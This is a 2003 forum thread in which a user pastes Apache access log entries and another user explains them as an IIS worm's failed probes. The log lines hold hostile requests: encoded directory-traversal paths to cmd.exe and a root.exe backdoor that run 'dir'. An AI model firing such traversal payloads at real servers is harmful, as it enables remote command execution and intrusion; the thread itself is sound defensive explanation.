what does this mean

[csniffer]

hi all, has anybody got any idea what this means in my Apache access log

217.217.133.20 - - [08/Nov/2003:20:27:09 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 322
217.217.133.20 - - [08/Nov/2003:20:27:10 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 320
217.217.133.20 - - [08/Nov/2003:20:27:11 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330
217.217.133.20 - - [08/Nov/2003:20:27:12 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330
217.217.133.20 - - [08/Nov/2003:20:27:13 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344
217.217.133.20 - - [08/Nov/2003:20:27:13 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 361
217.217.133.20 - - [08/Nov/2003:20:27:14 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 361
217.217.133.20 - - [08/Nov/2003:20:27:18 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 377
217.217.133.20 - - [08/Nov/2003:20:27:18 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343
217.217.133.20 - - [08/Nov/2003:20:27:19 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343
217.217.133.20 - - [08/Nov/2003:20:27:20 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343
217.217.133.20 - - [08/Nov/2003:20:27:21 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343
217.217.133.20 - - [08/Nov/2003:20:27:22 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 334
217.217.133.20 - - [08/Nov/2003:20:27:26 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 334
217.217.133.20 - - [08/Nov/2003:20:27:26 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344
217.217.133.20 - - [08/Nov/2003:20:27:27 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344
213.58.114.225 - - [08/Nov/2003:21:22:40 +0000] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 347

thanks

To err is human, to completely mess up takes a computer.

 

[sleipnir214]

There's an IIS-specific worm trying to infect your system.

Want the best answers? Ask the best questions:

http://www.catb.org/~esr/faqs/smart-questions.html

TANSTAAFL!!

 

[csniffer]

IIS ? what is that and how do i check if the worm succeeded? is it just a case of run my virus scanner?

To err is human, to completely mess up takes a computer.

 

[sleipnir214]

You've asked this question in the Apache forum. From that I infer you are running Apache. From that I infer that, by definition, an IIS-specific worm hasn't infected your system.

Also, if you look at the status code returned by Apache, you'll see "404", which means "Not found".

If you are running Apache on a non-Win32 platform, cmd.exe is probably not a command, which the worm requires to infect your system.

Want the best answers? Ask the best questions:

http://www.catb.org/~esr/faqs/smart-questions.html

TANSTAAFL!!

 

[csniffer]

thank you, today I have learned a bit more

To err is human, to completely mess up takes a computer.